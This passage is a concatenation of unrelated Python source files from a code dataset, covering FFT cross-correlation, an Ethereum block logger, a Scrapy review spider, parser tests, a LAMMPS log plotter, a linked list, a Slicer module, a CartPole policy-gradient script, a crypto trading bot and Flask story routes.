\n \"\"\"\n # TODO: implement for complex arrays\n # TODO: implement multidims\n\n if mode not in {'full', 'same'}:\n raise ValueError(\"Correlation mode {} is not valid.\".format(mode))\n\n if len(axes) != 2:\n raise ValueError('`axes` parameter must be 2-tuple, not `{}`'.format(axes))\n\n arr1, arr2 = np.array(arr1, dtype = np.float), np.array(arr2, dtype = np.float)\n\n # Determine final size along transformation axes\n # TODO: compare with using next_fast_len and without\n s1, s2 = tuple(arr1.shape[ax] for ax in axes), tuple(arr2.shape[ax] for ax in axes)\n final_shape = tuple( next_fast_len(ax1 + ax2 - 1) for ax1, ax2 in zip(s1, s2))\n\n fft = partial(rfft2, s = final_shape, axes = axes, **FFTOPS)\n ifft = partial(irfft2, s = final_shape, axes = axes, **FFTOPS)\n rot180 = lambda arr : mirror(mirror(arr, axes[0]), axes[1]) \t# numpy.flip not available in numpy 1.11\n\n if m1 is None:\n m1 = np.zeros_like(arr1, dtype = np.bool)\n else:\n m1 = np.array(m1)\n\n if m2 is None:\n m2 = np.array(m1)\n else:\n m2 = np.array(m2)\n\n arr1[m1] = 0.0\n arr2[m2] = 0.0\n\n # Rotation in real-space instead of conjugation in fourier domain\n # because we might be using rfft instead of complex fft\n arr2[:] = rot180(arr2)\n m2[:] = rot180(m2)\n\n F1 = fft(arr1)\n F2s = fft(arr2)\n\n M1 = fft(~m1)\n M2s = fft(~m2)\n\n iM1M2s = ifft(M1 * M2s)\n iM1M2s[:] = np.rint(iM1M2s)\n iM1M2s[:] = np.maximum(iM1M2s, EPS)\n\n iF1M2s = ifft(F1 * M2s)\n iM1F2s = ifft(M1 * F2s)\n\n # I have noticed no clear performance boost by storing\n # repeated calculation (e.g. ifft(M1 * M2s)); however, the following\n # is already hard enough to read...\n numerator = ifft(F1 * F2s)\n numerator -= iF1M2s * iM1F2s / iM1M2s\n\n denominator = ifft(fft(np.square(arr1)) * M2s) - iF1M2s**2/iM1M2s\n denominator *= ifft(M1*fft(np.square(arr2))) - iM1F2s**2/iM1M2s\n denominator[:] = np.clip(denominator, a_min = 0, a_max = None)\n denominator[:] = np.sqrt(denominator)\n\n if mode == 'same':\n denominator = _centered(denominator, arr1.shape, axes = axes)\n numerator = _centered(numerator, arr1.shape, axes = axes)\n\n if out is None:\n out = np.zeros_like(denominator)\n\n nonzero = np.nonzero(denominator)\n out[nonzero] = numerator[nonzero] / denominator[nonzero]\n out[np.logical_or(out > 1, out < -1)] = 0\n\n return out\n\ndef _centered(arr, newshape, axes = (0, 1)):\n\t# Return the center newshape portion of the array.\n\tnewshape = np.asarray(newshape)\n\tcurrshape = np.array(arr.shape)\n\n\tslices = [slice(None, None)] * arr.ndim\n\n\tfor ax in axes:\n\t\tstartind = (currshape[ax] - newshape[ax]) // 2\n\t\tendind = startind + newshape[ax]\n\t\tslices[ax] = slice(startind, endind)\n\n\treturn arr[tuple(slices)]","sub_path":"skued/image/correlation.py","file_name":"correlation.py","file_ext":"py","file_size_in_byte":5138,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"145230514","text":"import sys\nimport time\nimport pprint\n\nfrom web3 import *\n# w3 = Web3(IPCProvider('/home/sourav/test-eth4/geth.ipc', timeout=100000))\nw3 = Web3(IPCProvider('/home/ubuntu/gitRepoEVD/.ethereum/geth.ipc', timeout=100000))\n# w3.miner.stop()\n\n# time.sleep(30)\nfile1 = open('/home/ubuntu/gitRepoEVD/minersInChain',\"w\")\n# file1 = open('/home/sourav/minersInChain'+str(i),\"w\") \nhighestBlock = w3.eth.getBlock('latest')\nhighestBlock = highestBlock['number']\nfor blockHeight in range(0,highestBlock+1):\n block = w3.eth.getBlock(blockHeight)\n txns = block['transactions']\n numTxns = len(txns)\n miner 
= block['miner']\n blockHash = block['hash']\n gasLimit = block['gasLimit']\n gasUsed = block['gasUsed']\n file1.write(str(blockHeight)+\",\"+str(blockHash.hex())+\",\"+str(miner)+\",\"+str(numTxns)+\",\"+str(gasLimit)+\",\"+str(gasUsed)+\"\\n\")\nfile1.close()","sub_path":"stopExperiment.py","file_name":"stopExperiment.py","file_ext":"py","file_size_in_byte":857,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"94396090","text":"__author__ = 'jim'\r\n\r\nimport re\r\n\r\nfrom scrapy.http import Request\r\n\r\nfrom alascrapy.items import ProductItem, ReviewItem, CategoryItem, ProductIdItem\r\nfrom alascrapy.spiders.base_spiders.ala_spider import AlaSpider\r\nfrom alascrapy.lib.generic import date_format\r\n\r\n\r\nclass NeweggComSpider(AlaSpider):\r\n name = 'newegg_com'\r\n allowed_domains = ['newegg.com']\r\n start_urls = ['http://www.newegg.com/Feedback/Reviews.aspx']\r\n \r\n def parse(self, response):\r\n category_xpath = '//form[@name=\"SearchPanel\"]/select/option[@value>0]/@value'\r\n categories = self.extract_list(response.xpath(category_xpath))\r\n for category in categories:\r\n category_url = 'http://www.newegg.com/FeedBack/CustratingAllReview.aspx?Order=0&Pagesize=100&N='\r\n category_url = category_url+category\r\n yield Request(url=category_url, callback=self.parse_category)\r\n\r\n def parse_category(self, response):\r\n category = CategoryItem()\r\n category['category_path'] = self.extract(\r\n response.xpath('//div[@id=\"bcaCustratingAllReview\"]/div[contains(@class,\"listRow\")][1]/a[2]/text()'))\r\n category['category_leaf'] = category['category_path']\r\n category['category_url'] = response.url\r\n yield category\r\n \r\n if not self.should_skip_category(category):\r\n products = self.extract_list(response.xpath('//div[contains(@class,\"listRow\")]/div[1]/a/@href'))\r\n for product in products:\r\n request = Request(url=product, callback=self.parse_product)\r\n request.meta['category'] = category\r\n yield request\r\n \r\n def parse_product(self, response):\r\n category = response.meta['category']\r\n product = ProductItem()\r\n product['TestUrl'] = response.url\r\n product['OriginalCategoryName'] = category['category_path']\r\n product['ProductName'] = self.extract(response.xpath('//h1/span/text()'))\r\n product['source_internal_id'] = self.extract(response.xpath('//div[@id=\"baBreadcrumbTop\"]//em/text()'))\r\n product['PicURL'] = self.extract(response.xpath('//a[@id=\"A2\"]//img/@src'))\r\n brand = self.extract(response.xpath('//dl/dt[contains(text(),\"Brand\")]/parent::*/dd/text()'))\r\n if brand:\r\n product[\"ProductManufacturer\"] = brand\r\n model = self.extract(response.xpath('//dl/dt[contains(text(),\"Model\")]/parent::*/dd/text()'))\r\n if brand and model:\r\n product['ProductName'] = brand + ' ' + model\r\n yield product\r\n \r\n if model:\r\n product_id = ProductIdItem()\r\n product_id['source_internal_id'] = product[\"source_internal_id\"]\r\n product_id['ProductName'] = product[\"ProductName\"]\r\n product_id['ID_kind'] = \"MPN\"\r\n product_id['ID_value'] = model\r\n yield product_id\r\n \r\n reviews = response.xpath('//table[@class=\"grpReviews\"]/tbody/tr')\r\n for review in reviews:\r\n user_review = ReviewItem()\r\n user_review['DBaseCategoryName'] = \"USER\"\r\n user_review['ProductName'] = product['ProductName']\r\n user_review['TestUrl'] = product['TestUrl']\r\n date = self.extract(review.xpath('.//li[2]/text()'))\r\n if date:\r\n date = date[0:-2]\r\n user_review['TestDateText'] = 
date_format(date, \"%m/%d/%Y %H:%M:%S\")\r\n rating = self.extract(review.xpath('.//span[@class=\"itmRating\"]//text()'))\r\n rate = re.findall(r'Rating:\\s*(\\d+)/5', rating)\r\n if rate:\r\n user_review['SourceTestRating'] = rate[0]\r\n user_review['Author'] = self.extract(review.xpath('.//li[1]//text()'))\r\n user_review['TestTitle'] = self.extract(review.xpath('.//h3/text()'))\r\n user_review['TestSummary'] = self.extract_all(\r\n review.xpath('.//p/em[contains(text(),\"Other Thoughts\")]/parent::*/text()'))\r\n user_review['TestPros'] = self.extract_all(\r\n review.xpath('.//p/em[contains(text(),\"Pros\")]/parent::*/text()'))\r\n user_review['TestCons'] = self.extract_all(\r\n review.xpath('.//p/em[contains(text(),\"Cons\")]/parent::*/text()'))\r\n user_review['source_internal_id'] = product['source_internal_id']\r\n yield user_review\r\n","sub_path":"alascrapy/spiders/newegg_com.py","file_name":"newegg_com.py","file_ext":"py","file_size_in_byte":4402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"253040299","text":"from helpers.data_detection import get_brackets, get_variable, get_string_contents, get_type, list_index_positions, detect_duplicate\nfrom helpers.commas import soft_comma\nimport os\nfrom helpers.file_manager import file_manager\nfrom tests.config_mock import setup_config, teardown_config\n\ndef debug_print(e, a):\n print(\"EXPECTED\")\n print(e)\n print(\"ACTUAL\")\n print(a)\n\ndef test_get_string_contents():\n setup_config()\n string = \"foo = 'hello!'\"\n assert(get_string_contents(string, 0) == \"'hello!'\")\n\ndef test_get_variable():\n file = file_manager('tests/sandbox/settings.py', 'r')\n data = {\n 'target': ['thing']\n }\n var = get_variable(file, data)\n print(var)\n assert(var['string'] == 'thing = \"hello\"')\n\ndef test_get_type():\n string = \"config = { 'foo': 1 }\"\n types = get_type(string)\n assert(types['typ'] == '{')\n assert(types['opposite'] == '}')\n\n string = \"config = { 'foo': 1, bar: [2,3,4] }\"\n types = get_type(string)\n assert(types['typ'] == '{')\n assert(types['opposite'] == '}')\n\n string = \"config = [ 2,3,3 ]\"\n types = get_type(string)\n assert(types['typ'] == '[')\n assert(types['opposite'] == ']')\n\n string = \"config = [ {'foo': 1}, 2,3,3 ]\"\n types = get_type(string)\n assert(types['typ'] == '[')\n assert(types['opposite'] == ']')\n\ndef test_finds_closing_bracket():\n file = file_manager('tests/sandbox/settings.py', 'read')\n actual = get_brackets(file, file.find('config'))\n\n assert(actual['start'] == 194)\n assert(actual['stop'] == 343)\n\ndef test_finds_opening_bracket():\n file = file_manager('tests/sandbox/settings.py', 'read')\n actual = get_brackets(file, file.find('INSTALLED_APPS'))\n\n assert(actual['start'] == 50)\n\n\ndef test_finds_list_indices():\n # Should include all commas that are not inside of strings, or nested children\n string = \"foo = [1,2,'hello, world',{'bar': 1, 'cats': 2},'lol']\"\n indices = list_index_positions(string, 0, len(string) - 1)\n expected = [7,9,11,26,48]\n\n debug_print(expected, indices)\n assert(indices == expected)\n\ndef test_soft_comma():\n # Should add commas and a space if necessary, remove if unnecessary.\n item1 = 'foo'\n item2 = 'bar'\n output = soft_comma(item1, item2)\n assert(output == 'foo, bar')\n\n item1 = 'foo,'\n item2 = 'bar'\n output = soft_comma(item1, item2)\n assert(output == 'foo, bar')\n\n item1 = 'foo,'\n item2 = ',bar'\n output = soft_comma(item1, item2)\n assert(output == 'foo, bar')\n\ndef 
test_detect_duplicate():\n content = 'foo'\n target = 'stuff = [\"bar\", \"foo\": 123]'\n assert(detect_duplicate(target, content) == True)\n\n content = 'foo'\n target = 'stuff = [\"bar\", \"baz\": 123]'\n assert(detect_duplicate(target, content) == False)\n\n content = 'foo,'\n target = 'stuff = [\"bar\", \"foo\": 123]'\n assert(detect_duplicate(target, content) == True)\n\n content = '\"foo\"'\n target = 'stuff = [\"bar\", \"foo\"]'\n assert(detect_duplicate(target, content) == True)\n\n content = 'foo'\n target = 'stuff = [\"bar\", \"foo\"]'\n assert(detect_duplicate(target, content) == True)\n","sub_path":"tests/test_data_detection.py","file_name":"test_data_detection.py","file_ext":"py","file_size_in_byte":3125,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"273428862","text":"#!/usr/bin/env python3\n# coding=utf-8\n\nimport os, sys, re, math\nimport numpy as np\n\nOMITSTEP = -1\nENDSTEP = -1\nif len(sys.argv) >= 3 and sys.argv[2].isdigit():\n OMITSTEP = int(sys.argv[2])\nif len(sys.argv) >= 4 and sys.argv[3].isdigit():\n ENDSTEP = int(sys.argv[3])\n\ndef read_log(log_file):\n inf=open(log_file).read()\n nMin = len(re.findall('\\nMinimization', inf))\n nRun = len(re.findall('\\nStep', inf)) - nMin\n print('%i Min, %i Run' %(nMin, nRun))\n\n run = -nMin\n types: [str]\n data: [[float]]\n START = False\n for line in open(log_file):\n if line.startswith('Step'):\n run += 1\n if run > 0:\n START = True\n if run == 1:\n types = line.strip().split()\n data=[[] for i in types]\n continue\n if run > 0 and line.startswith('Loop'):\n START = False\n continue\n if run > 0 and START:\n try:\n step = int(line.strip().split()[0])\n except:\n continue\n if step < OMITSTEP:\n continue\n if ENDSTEP > 0 and step > ENDSTEP:\n break\n for i in range(0, len(types)):\n data[i].append(float(line.strip().split()[i]))\n return types, data\n\ndef average_of_blocks(l, nblock=5):\n ave_block = []\n bsize = int(math.ceil(len(l)/nblock))\n for i in range(nblock):\n block = l[i*bsize:(i+1)*bsize]\n ave_block.append(np.mean(block))\n return ave_block\n\ndef block_average(l, nblock=5):\n ave_block = average_of_blocks(l, nblock)\n return np.mean(ave_block), np.std(ave_block, ddof=1)/math.sqrt(nblock)\n\ndef plot_data(types, data):\n print('Select the property to plot, or input any letter to quit:')\n option = 'File: %s, Steps: %i-%i, Samples: %i\\n' %(sys.argv[1], data[0][0], data[0][-1], len(data[0]))\n for i in range(1, len(types)):\n ave, stderr = block_average(data[i])\n inv_blocks = [1000 / ave for ave in average_of_blocks(data[i])]\n inv_ave = np.mean(inv_blocks)\n inv_stderr = np.std(inv_blocks, ddof=1) / math.sqrt(len(inv_blocks))\n\n option += '%6i: %14s %10.4g %10.4g 1E3/ %10.4g %10.4g\\n' %(i, types[i], ave, stderr, inv_ave, inv_stderr)\n # option += '%6i: %14s %10.4g %10.4g\\n' %(i, types[i], ave, stderr)\n print(option, end='')\n while True:\n plottype = input()\n if not plottype.isdigit():\n sys.exit()\n plottype = int(plottype)\n\n if plottype < 1 or plottype >= len(data):\n print('not valid')\n else:\n if not 'plt' in dir():\n import matplotlib.pyplot as plt\n plt.plot(data[0], data[plottype])\n plt.xlabel('Step')\n plt.ylabel(types[plottype])\n plt.show()\n\nif __name__ == '__main__':\n types, data = read_log(sys.argv[1])\n plot_data(types, data)\n\n","sub_path":"scripts/logplot.py","file_name":"logplot.py","file_ext":"py","file_size_in_byte":2932,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} 
+{"seq_id":"393404076","text":"import csv\nimport pandas as pd\nfrom pandas import Series, DataFrame\nimport numpy as np\nfrom com_blacktensor.ext.db import db, openSession, engine\nfrom sqlalchemy import func\nfrom com_blacktensor.util.file_handler import FileHandler\n# from run import search\n\nclass UserDfo(object):\n def __init__(self):\n self.fileHandler = FileHandler() \n\n def create(self):\n print('============Test1==========')\n df = pd.DataFrame(\n {\n 'email': 'aaaaaa@naver.com',\n 'name': 'bbbbb',\n 'password': 'ccc56123',\n 'type': 'a',\n 'gender': 'M',\n 'age': 20\n }, index=[0]\n )\n print(df)\n return df\n\n def get_mypage(self):\n print('=========mypage==========')\n df = pd.DataFrame(\n {\n \"name\": 'test111',\n \"money\": 123,\n \"type\": 'sdas',\n \"date\": '2020-10-10',\n \"price\": 123,\n \"cnt\": 123\n }, index=[0]\n )\n print(df)\n return df","sub_path":"com_blacktensor/usr/model/user_dfo.py","file_name":"user_dfo.py","file_ext":"py","file_size_in_byte":1104,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"78269248","text":"# Program contains all the basic functions related to the doubly single linked list\n# Author : DC\n\nclass Node:\n def __init__(self, value):\n self.value = value\n self.next = None\n self.prev = None\n\n\nclass DoublyLinkedList:\n\n def __init__(self):\n self.head = None\n self.tail = None\n\n def __iter__(self):\n node = self.head\n while node:\n yield node\n node = node.next\n\n def insert(self, value, location):\n newNode = Node(value)\n if self.head is None:\n self.head = newNode\n self.tail = newNode\n else:\n if location == 0:\n newNode.next = self.head\n self.head.prev = newNode\n self.head = newNode\n elif location == 1:\n newNode.prev = self.tail\n self.tail.next = newNode\n self.tail = newNode\n else:\n tempNode = self.head\n index = 0\n while index < location - 1:\n tempNode = tempNode.next\n index += 1\n newNode.next = tempNode.next\n tempNode.next.prev = newNode\n tempNode.next = newNode\n newNode.prev = tempNode\n\n def traversal(self):\n if self.head is None:\n print(\"The list is empty while traversal.\")\n return\n node = self.head\n while node:\n print(node.value)\n node = node.next\n\n def revTraversal(self):\n if self.head is None:\n print(\"The list is empty while reverse traversal.\")\n return\n node = self.tail\n while node:\n print(node.value)\n node = node.prev\n\n def search(self, value):\n if self.head is None:\n print(\"The list is empty while searching.\")\n return\n else:\n tempNode = self.head\n while tempNode:\n if tempNode.value == value:\n print(\"Value found\")\n return\n tempNode = tempNode.next\n print(\"Value not found.\")\n\n def delete(self, location):\n if self.head is None:\n print(\"The list is empty while deleting.\")\n return\n else:\n if self.head == self.tail:\n self.head = None\n self.tail = None\n else:\n if location == 0:\n self.head = self.head.next\n self.head.prev = None\n elif location == 1:\n self.tail = self.tail.prev\n self.tail.next = None\n else:\n tempNode = self.head\n index = 0\n while index < location - 1:\n tempNode = tempNode.next\n index += 1\n tempNode.next = tempNode.next.next\n tempNode.next.prev = tempNode\n\n\nclass Main:\n\n def __init__(self):\n pass\n\n\nif __name__ == '__main__':\n dll = DoublyLinkedList()\n dll.insert(1, 0)\n dll.insert(2, 0)\n dll.insert(3, 0)\n dll.insert(4, 1)\n dll.insert(6, 1)\n dll.insert(5, 4)\n print([node.value for node in dll])\n dll.traversal()\n print(\"============\")\n 
dll.revTraversal()\n dll.search(12)\n dll.delete(0)\n print([node.value for node in dll])\n dll.delete(1)\n print([node.value for node in dll])\n dll.delete(-1)\n print([node.value for node in dll])\n","sub_path":"linkedList/doublyLinkedList.py","file_name":"doublyLinkedList.py","file_ext":"py","file_size_in_byte":3562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"173663870","text":"import os\nimport qt\nimport logging\nimport vtk\nimport ctk\n\nimport slicer\nfrom slicer.ScriptedLoadableModule import *\n\nfrom CardiacDeviceSimulator import CardiacDeviceSimulatorWidget\n#from CardiacDeviceSimulator import CardiacDeviceSimulatorLogic\n\n#from CardiacDeviceSimulatorUtils.widgethelper import UIHelper\n#from CardiacDeviceSimulatorUtils.DeviceCompressionQuantificationWidget import DeviceCompressionQuantificationWidget\n#from CardiacDeviceSimulatorUtils.DeviceDataTreeWidget import DeviceDataTreeWidget\n#from CardiacDeviceSimulatorUtils.DeviceDeformationWidget import DeviceDeformationWidget\n#from CardiacDeviceSimulatorUtils.DevicePositioningWidget import DevicePositioningWidget\n#from CardiacDeviceSimulatorUtils.DeviceSelectorWidget import DeviceSelectorWidget\n\nfrom AsdVsdDevices.devices import *\n\n\n#\n# AsdVsdDeviceSimulator\n#\n\nclass AsdVsdDeviceSimulator(ScriptedLoadableModule):\n \"\"\"Uses ScriptedLoadableModule base class, available at:\n https://github.com/Slicer/Slicer/blob/master/Base/Python/slicer/ScriptedLoadableModule.py\n \"\"\"\n\n deviceClasses = [SeptalOccluder, MultiFenestratedSeptalOccluder,\n DuctOccluder, DuctOccluderII, MuscularVSDOccluder, CustomDevice]\n\n def __init__(self, parent):\n ScriptedLoadableModule.__init__(self, parent)\n self.parent.title = \"ASD/VSD Device Simulator\"\n self.parent.categories = [\"Cardiac\"]\n self.parent.dependencies = [\"CardiacDeviceSimulator\"]\n self.parent.contributors = [\"Christian Herz (CHOP), Andras Lasso (PerkLab), Matt Jolley (UPenn)\"]\n self.parent.helpText = \"\"\"\n Evaluate devices for ASD/VSD treatment.\n \"\"\"\n self.parent.acknowledgementText = \"\"\"\n This file was originally developed by Christian Herz (CHOP) and Andras Lasso (PerkLab).\n \"\"\"\n\n try:\n from CardiacDeviceSimulator import CardiacDeviceSimulatorWidget\n for deviceClass in AsdVsdDeviceSimulator.deviceClasses:\n CardiacDeviceSimulatorWidget.registerDevice(deviceClass)\n except ImportError:\n pass\n\n#\n# AsdVsdDeviceSimulatorWidget\n#\n\nclass AsdVsdDeviceSimulatorWidget(CardiacDeviceSimulatorWidget):\n \"\"\"Uses ScriptedLoadableModuleWidget base class, available at:\n https://github.com/Slicer/Slicer/blob/master/Base/Python/slicer/ScriptedLoadableModule.py\n \"\"\"\n\n def __init__(self, parent=None, deviceClasses=None):\n CardiacDeviceSimulatorWidget.__init__(self, parent, AsdVsdDeviceSimulator.deviceClasses)\n self.logic.moduleName = \"AsdVsdDeviceSimulator\"\n\n def setup(self):\n CardiacDeviceSimulatorWidget.setup(self)\n if not self.setupSuccessful:\n return\n\n # Customize device positioning section\n self.devicePositioningWidget.vesselGroupBox.hide()\n self.devicePositioningWidget.centerlineGroupBox.hide()\n # Expand translate and rotate sections\n self.devicePositioningWidget.devicePositioningPositionSliderWidget.findChildren(ctk.ctkCollapsibleGroupBox)[0].setChecked(True)\n self.devicePositioningWidget.devicePositioningOrientationSliderWidget.findChildren(ctk.ctkCollapsibleGroupBox)[0].setChecked(True)\n\n self.deviceDeformationSection.hide()\n 
self.quantificationSection.hide()\n","sub_path":"AsdVsdDeviceSimulator/AsdVsdDeviceSimulator.py","file_name":"AsdVsdDeviceSimulator.py","file_ext":"py","file_size_in_byte":3111,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"317855911","text":"import gym\nimport numpy as np\nimport torch\nfrom matplotlib import pylab as plt\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n\ndef running_mean(x, N=50):\n cumsum = np.cumsum(np.insert(x, 0, 0))\n return (cumsum[N:] - cumsum[:-N]) / float(N)\n\n\ndef loss_fn(preds, r):\n # pred is output from neural network, a is action index\n # r is return (sum of rewards to end of episode), d is discount factor\n return -torch.sum(r * torch.log(preds)) / len(r) # element-wise multipliy, then sum\n\n\nclass CartPolePolicyGradientNet(nn.Module):\n\n def __init__(self):\n super(CartPolePolicyGradientNet, self).__init__()\n input = 4 # A Input data is length 4\n l2 = 150\n output = 2 # B Output is a 2-length vector for the Left and the Right actions\n self.fc1 = nn.Linear(input, l2)\n self.fc2 = nn.Linear(l2, output)\n self.losses = [] # A\n\n def forward(self, x):\n x = F.leaky_relu_(self.fc1(x))\n x = self.fc2(x)\n x = F.softmax(x, dim=0) # COutput is a softmax probability distribution over actions\n return x\n\n def plot(self):\n plt.figure(figsize=(10, 7))\n plt.plot(self.losses)\n plt.xlabel(\"Epochs\", fontsize=22)\n plt.ylabel(\"Loss\", fontsize=22)\n plt.show()\n\n\ndef discount_rewards(rewards, gamma=0.99):\n lenr = len(rewards)\n discount = torch.pow(gamma, torch.arange(lenr).float())\n discount_ret = discount * rewards # A Compute exponentially decaying rewards\n # discount_ret /= discount_ret.max()\n return discount_ret.cumsum(-1).flip(0)\n\n\ndef discount_rewards_hubbs(rewards, gamma=0.99):\n r = np.array([gamma ** i * rewards[i]\n for i in range(len(rewards))])\n # Reverse the array direction for cumsum and then\n # revert back to the original order\n r = r.cumsum()[::-1]\n return torch.tensor(np.array(r))\n\n\nif __name__ == '__main__':\n\n model = CartPolePolicyGradientNet()\n\n learning_rate = 0.001\n optimizer = torch.optim.Adam(model.parameters(), lr=learning_rate)\n\n env = gym.make('CartPole-v0')\n MAX_DUR = 200\n MAX_EPISODES = 1000\n gamma = 0.99\n time_steps = []\n for episode in range(MAX_EPISODES):\n curr_state = env.reset()\n done = False\n transitions = [] # list of state, action, rewards\n\n for t in range(MAX_DUR): # while in episode\n act_prob = model(torch.from_numpy(curr_state).float())\n action = np.random.choice(np.array([0, 1]), p=act_prob.data.numpy())\n prev_state = curr_state\n curr_state, reward, done, info = env.step(action)\n transitions.append((prev_state, action, reward))\n if done:\n break\n\n # Optimize policy network with full episode\n ep_len = len(transitions) # episode length\n time_steps.append(ep_len)\n\n reward_batch = torch.Tensor([r for (s, a, r) in transitions])\n discounted_rewards = discount_rewards(reward_batch)\n\n state_batch = torch.Tensor([s for (s, a, r) in transitions]) # L Collect the states in the episode in a single tensor\n action_batch = torch.Tensor([a for (s, a, r) in transitions]) # M\n\n pred_batch = model(state_batch)\n prob_batch = pred_batch.gather(dim=1, index=action_batch.long().view(-1, 1)).squeeze()\n\n loss = loss_fn(prob_batch, discounted_rewards)\n model.losses.append(loss.detach().item())\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n del reward_batch\n del state_batch\n del action_batch\n del 
pred_batch\n        del discounted_rewards\n        del transitions\n        del prob_batch\n\n    env.close()\n\n    plt.figure(figsize=(10, 7))\n    plt.ylabel(\"Duration\")\n    plt.xlabel(\"Episode\")\n    plt.plot(running_mean(time_steps, 50), color='green')\n    plt.show()\n\n    torch.save(model.state_dict(), '../../models/cartPolePGBatch.pt')\n    # model.plot()\n","sub_path":"pythonML/notebooks/Pytorch/sandbox/reinforcement_learning/policy_gradient/CartPolePGBatch.py","file_name":"CartPolePGBatch.py","file_ext":"py","file_size_in_byte":3950,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"396539431","text":"from TradingTools import Account\r\nfrom TradingTools import Currency\r\nimport time\r\n\r\nclass AutoTrading:\r\n    def __init__(self, targetBuyPrice = 0, targetSellPrice = 0, amountBuy = 0, amountSell = 0, currency = Currency.BTC):\r\n        self.account = Account()\r\n        self.targetBuyPrice = targetBuyPrice\r\n        self.targetSellPrice = targetSellPrice\r\n        self.amountBuy = amountBuy\r\n        self.amountSell = amountSell\r\n        self.currency = currency\r\n\r\n    def displayParametrs(self):\r\n        print(\"+++ Trading Parameters +++\")\r\n        print(\"-------------------------\")\r\n        print(\"Target buy price : \" + str(self.targetBuyPrice))\r\n        print(\"Target sell price : \" + str(self.targetSellPrice))\r\n        print(\"Amount buy (USD) : \" + str(self.amountBuy))\r\n        if self.currency == Currency.BTC:\r\n            print(\"Amount sell (BTC) : \" + str(self.amountSell))\r\n        else:\r\n            print(\"Amount sell (ETH) : \" + str(self.amountSell))\r\n\r\n\r\n    def configParametrs(self):\r\n        targetBuyPrice = input(\"Input target buy price: \")\r\n        targetSellPrice = input(\"Input target sell price: \")\r\n        amountBuy = input(\"Input amount to trade: \")\r\n        currency = input(\"Input currency: \")\r\n\r\n        self.targetSellPrice = float(targetSellPrice)\r\n        self.targetBuyPrice = float(targetBuyPrice)\r\n        self.amountBuy = float(amountBuy)\r\n        self.amountSell = float(amountBuy)/float(targetBuyPrice)\r\n        if str.upper(currency) == \"BTC\":\r\n            self.currency = Currency.BTC\r\n        elif str.upper(currency) == \"ETH\":\r\n            self.currency = Currency.ETH\r\n        else:\r\n            print(\"There is no \" + currency + \" currency...\")\r\n\r\n    def autoBuy(self):\r\n        bought = False\r\n        while bought == False:\r\n            self.account.update()\r\n            actualPrice = 0\r\n            if self.currency == Currency.BTC:\r\n                actualPrice = self.account.priceBTC\r\n            else:\r\n                actualPrice = self.account.priceETH\r\n\r\n            self.account.displayAccount()\r\n            self.displayParametrs()\r\n\r\n            if self.targetBuyPrice >= actualPrice:\r\n                self.account.trade(self.amountBuy, Currency.USD, self.currency)\r\n                self.amountSell = self.amountBuy/actualPrice\r\n                print(\"\\n BOUGHT \")\r\n                bought = True\r\n            else:\r\n                time.sleep(59)\r\n\r\n    def autoSell(self):\r\n        sold = False\r\n        while sold == False:\r\n            self.account.update()\r\n            actualPrice = 0\r\n            if self.currency == Currency.BTC:\r\n                actualPrice = self.account.priceBTC\r\n            else:\r\n                actualPrice = self.account.priceETH\r\n\r\n            self.account.displayAccount()\r\n            self.displayParametrs()\r\n\r\n            if self.targetSellPrice <= actualPrice:\r\n                self.account.trade(self.amountSell, self.currency, Currency.USD)\r\n                print(\"\\n SOLD\")\r\n                sold = True\r\n            else:\r\n                time.sleep(59)\r\n\r\n    def autoTrade(self):\r\n        self.autoBuy()\r\n        self.autoSell()\r\n\r\n    def tradeMenu(self):\r\n        accept = False\r\n        while accept == False:\r\n            self.account.displayAccount()\r\n            self.displayParametrs()\r\n            print(\"MENU\")\r\n            print(\"===============\")\r\n            print(\"1. Change parameters\")\r\n            print(\"2. 
Make order\")\r\n print(\"0. Exit\")\r\n choice = input(\"Your choice: \")\r\n if choice == '1':\r\n self.configParametrs()\r\n elif choice == '2':\r\n self.autoTrade()\r\n elif choice == '0':\r\n accept = True\r\n\r\n\r\n\r\n \r\n\r\n","sub_path":"AutoTrading.py","file_name":"AutoTrading.py","file_ext":"py","file_size_in_byte":3743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"466297915","text":"from flask import Blueprint, jsonify, request\nfrom flask_login import login_required, current_user\nfrom app.models import Story, User, Comment, Like\nfrom app.models import db\n\n\nstory_routes = Blueprint('stories', __name__)\n\n\n# Get all the story route\n@story_routes.route('/')\ndef stories():\n # stories = Story.query.all()\n stories = Story.query.order_by(Story.id.desc()).limit(6)\n return {'stories': [story.to_dict() for story in stories]}\n\n\n# Get one story route with author and associated comments, likes\n@story_routes.route('/')\ndef one_story(id):\n story = Story.query.get(id)\n author = User.query.join(Story, User.id == Story.author_id).filter(Story.id == id)\n comments = Comment.query.join(Story, Comment.story_id == Story.id ).filter(Story.id == id)\n count_likes = sum([like.count for like in story.likes])\n \n return {\n 'author': [s.to_dict() for s in author],\n \"story\" : [story.to_dict()],\n 'comments': [comment.to_dict() for comment in comments],\n \"total_likes\": count_likes\n }\n\n\n# Post a story route\n@story_routes.route('', methods=['POST'])\ndef add_story():\n title = request.json['title']\n body = request.json['body']\n author_id = User.query.filter_by(username = request.json['author']).first().id\n \n new_story = Story(title, body, author_id)\n \n db.session.add(new_story)\n db.session.commit()\n \n return {\"id\": new_story.id}\n\n\n# Update a story route\n@story_routes.route('/', methods=[\"PUT\"])\n@login_required\ndef update_story(id):\n story = Story.query.get(id)\n # if current_user.get_id() != story.author_id:\n # return jsonify('not authorized!')\n new_title = request.json['title']\n new_body = request.json['body']\n story.title = new_title\n story.body = new_body\n db.session.add(story)\n db.session.commit()\n return story.to_dict()\n\n\n# Delete a story route\n@story_routes.route('/', 